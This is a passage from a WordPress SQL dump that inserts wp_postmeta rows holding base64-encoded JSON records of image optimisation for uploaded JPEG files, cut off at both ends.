giOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxMDAsImlkIjozMTU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTgwMHg1MzAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzExMCwiaWQiOjMxNTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny03Njh4NTA4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTA4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctNzY4eDUwOC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTc2OHg1MDguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MTE1LCJpZCI6MzE1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxMjMsImlkIjozMTU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzEyNiwiaWQiOjMxNTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MTI4LCJpZCI6MzE1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzMjgyMTc3LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzI4MjE3Ny01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjMyODIxNzctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxMzEsImlkIjozMTU1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28726, 3153, 'wpfc_optimisation_reduction', '221723'); 
INSERT INTO `wp_postmeta` VALUES (28727, 3153, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LmpwZyIsIndpZHRoIjoxMzMzLCJoZWlnaHQiOjEyODMsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC94aHQuanBnIiwicmVkdWN0aW9uIjoyMjE3MTYsInRpbWUiOjE0ODM1NDcxNDMsImlkIjoiMzE1MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwveGh0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MTQ2LCJpZCI6MzE1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC94aHQtODAweDc3MC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjc3MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC94aHQtODAweDc3MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC94aHQtODAweDc3MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxNDksImlkIjozMTUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3hodC03Njh4NzM5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzM5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3hodC03Njh4NzM5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3hodC03Njh4NzM5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzE1MiwiaWQiOjMxNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwveGh0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MTU0LCJpZCI6MzE1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC94aHQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC94aHQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC94aHQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxNTYsImlkIjozMTUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3hodC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3hodC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3hodC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzE1OSwiaWQiOjMxNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwveGh0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwveGh0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MTYyLCJpZCI6MzE1M31d'); 
INSERT INTO `wp_postmeta` VALUES (28728, 3101, 'wpfc_optimisation_reduction', '393752'); 
INSERT INTO `wp_postmeta` VALUES (28729, 3101, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUxNjczNDI5My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MTY3MzQyOTMuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUxNjczNDI5My5qcGciLCJyZWR1Y3Rpb24iOjM5Mzc0OCwidGltZSI6MTQ4MzU0NzE3MSwiaWQiOiIzMTAxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTE2NzM0MjkzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUxNjczNDI5My0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MTY3MzQyOTMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxNzQsImlkIjozMTAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MTY3MzQyOTMtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTE2NzM0MjkzLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUxNjczNDI5My04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzE3NywiaWQiOjMxMDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUxNjczNDI5My03Njh4NTEzLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MTY3MzQyOTMtNzY4eDUxMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTE2NzM0MjkzLTc2OHg1MTMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MTgwLCJpZCI6MzEwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTE2NzM0MjkzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUxNjczNDI5My0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MTY3MzQyOTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcxODMsImlkIjozMTAxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28730, 3093, 'wpfc_optimisation_reduction', '1047'); 
INSERT INTO `wp_postmeta` VALUES (28731, 3093, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvU2NhdmFnaW5nMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL1NjYXZhZ2luZzEuanBnIiwid2lkdGgiOjMyMiwiaGVpZ2h0IjoyNDEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9TY2F2YWdpbmcxLmpwZyIsInJlZHVjdGlvbiI6MTA0NCwidGltZSI6MTQ4MzU0NzE5NywiaWQiOiIzMDkzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9TY2F2YWdpbmcxLTI1MHgyNDEuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNDEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvU2NhdmFnaW5nMS0yNTB4MjQxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL1NjYXZhZ2luZzEtMjUweDI0MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyMDAsImlkIjozMDkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL1NjYXZhZ2luZzEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9TY2F2YWdpbmcxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvU2NhdmFnaW5nMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzIwMiwiaWQiOjMwOTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvU2NhdmFnaW5nMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL1NjYXZhZ2luZzEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9TY2F2YWdpbmcxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MjA0LCJpZCI6MzA5M31d'); 
INSERT INTO `wp_postmeta` VALUES (28732, 3065, 'wpfc_optimisation_reduction', '552303'); 
INSERT INTO `wp_postmeta` VALUES (28733, 3065, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTIuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NzI3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi5qcGciLCJyZWR1Y3Rpb24iOjU1MjI5NiwidGltZSI6MTQ4MzU0NzIxNywiaWQiOiIzMDY1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyMjAsImlkIjozMDY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItODAweDU4Mi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU4MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTgwMHg1ODIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNc